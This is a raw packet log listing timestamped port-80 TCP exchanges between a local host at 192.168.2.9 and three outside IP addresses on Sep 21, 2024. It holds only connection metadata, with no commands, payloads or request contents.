Sep 21, 2024 14:48:10.116182089 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116194010 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116205931 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116210938 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116218090 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116231918 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116250038 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116265059 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116478920 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116489887 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116501093 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116512060 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116528034 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116528988 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116539955 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116552114 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116553068 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116564035 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116569042 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116575956 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116588116 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116595030 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116600037 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116611958 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116621971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116625071 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116633892 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116645098 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116647959 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116666079 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116683960 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116686106 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116709948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116727114 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116751909 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116782904 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116795063 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116803885 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116822004 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116843939 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116883993 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116895914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116906881 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116918087 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.116925001 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116944075 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.116970062 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117012978 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117024899 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117036104 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117048025 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117050886 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117077112 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117096901 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117113113 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117125034 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117136955 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117146015 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117156982 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117181063 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117203951 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117243052 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117275000 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117289066 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117316008 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117330074 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117353916 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117367983 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117378950 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117392063 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117393970 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117413998 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117436886 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117502928 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117541075 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117615938 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117626905 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117638111 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117650032 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117654085 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117662907 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117674112 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117681026 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117686033 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117697954 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117705107 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117712975 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117728949 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117744923 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117759943 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117796898 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117809057 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117820024 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117829084 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117836952 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117841005 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117855072 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117854118 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117866993 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117878914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117881060 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117891073 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117891073 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117908001 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117928028 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117934942 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117942095 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.117974997 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.117983103 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.118041992 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.118053913 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.118067026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.118078947 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.118079901 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.118091106 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.118103027 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.118105888 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.118124962 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.118145943 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.118149996 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.118196964 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.139929056 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.139950037 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.139970064 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.139981985 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.139992952 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140005112 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140012980 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.140033007 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140045881 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140048981 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.140089989 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.140126944 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140140057 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140151024 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140161991 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140173912 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.140173912 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140189886 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.140217066 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.140221119 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140245914 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140259027 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.140286922 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.140300989 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140312910 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140324116 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140341997 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.140357018 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.140435934 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140448093 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140459061 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.140480995 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.140506029 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.144553900 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.144566059 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.144578934 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.144629002 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.144654989 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.144655943 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.144674063 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.144685984 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.144696951 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.144697905 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.144709110 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.144714117 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.144733906 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.144747972 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.147804022 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.147814035 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.147828102 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.147862911 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.147871971 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.147877932 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.147883892 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.147895098 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.147907019 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.147914886 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.147944927 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.147986889 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.147998095 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148006916 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148020029 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148030043 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148031950 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148041010 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148062944 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148088932 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148156881 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148169041 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148180008 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148190975 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148206949 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148226976 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148237944 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148236990 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148252010 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148263931 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148274899 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148277044 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148293972 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148320913 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148361921 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148372889 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148382902 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148395061 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148405075 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148407936 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148418903 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148423910 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148432016 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148449898 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148478031 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148507118 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148518085 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148529053 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148540020 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148550034 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148550987 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148561954 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148565054 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148574114 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148598909 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148629904 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148657084 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148669004 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148688078 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148696899 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148699045 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148710966 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148715973 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148722887 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148730993 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148734093 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148760080 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148773909 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148818970 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148828983 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148839951 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148852110 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148861885 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148865938 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148874044 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148884058 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148890018 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148895025 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148906946 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.148909092 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148936033 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.148960114 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149054050 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149065971 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149076939 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149089098 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149097919 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149102926 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149111032 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149115086 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149139881 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149153948 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149188042 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149199009 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149209023 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149220943 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149231911 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149231911 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149245024 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149260998 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149261951 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149270058 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149272919 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149283886 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149296045 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149303913 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149307013 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149317980 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149328947 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149331093 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149339914 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149353027 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149353981 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149379015 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149396896 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149502993 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149513960 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149525881 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149545908 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149557114 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149569988 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149574995 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149580956 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149591923 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149610996 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149621964 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149642944 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149710894 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149723053 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149733067 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149745941 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149755001 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149758101 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149770021 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149785995 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149806976 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149816036 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.149832964 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149856091 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.149995089 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150006056 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150017023 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150028944 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150039911 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150043964 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150049925 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150060892 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150063038 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.150072098 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150084972 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150084972 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.150094032 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150115013 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.150132895 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.150135994 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150147915 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150180101 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.150202990 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.150271893 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150283098 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150293112 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150305986 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150315046 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.150317907 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.150330067 CEST	80	49711	147.45.44.104	192.168.2.9
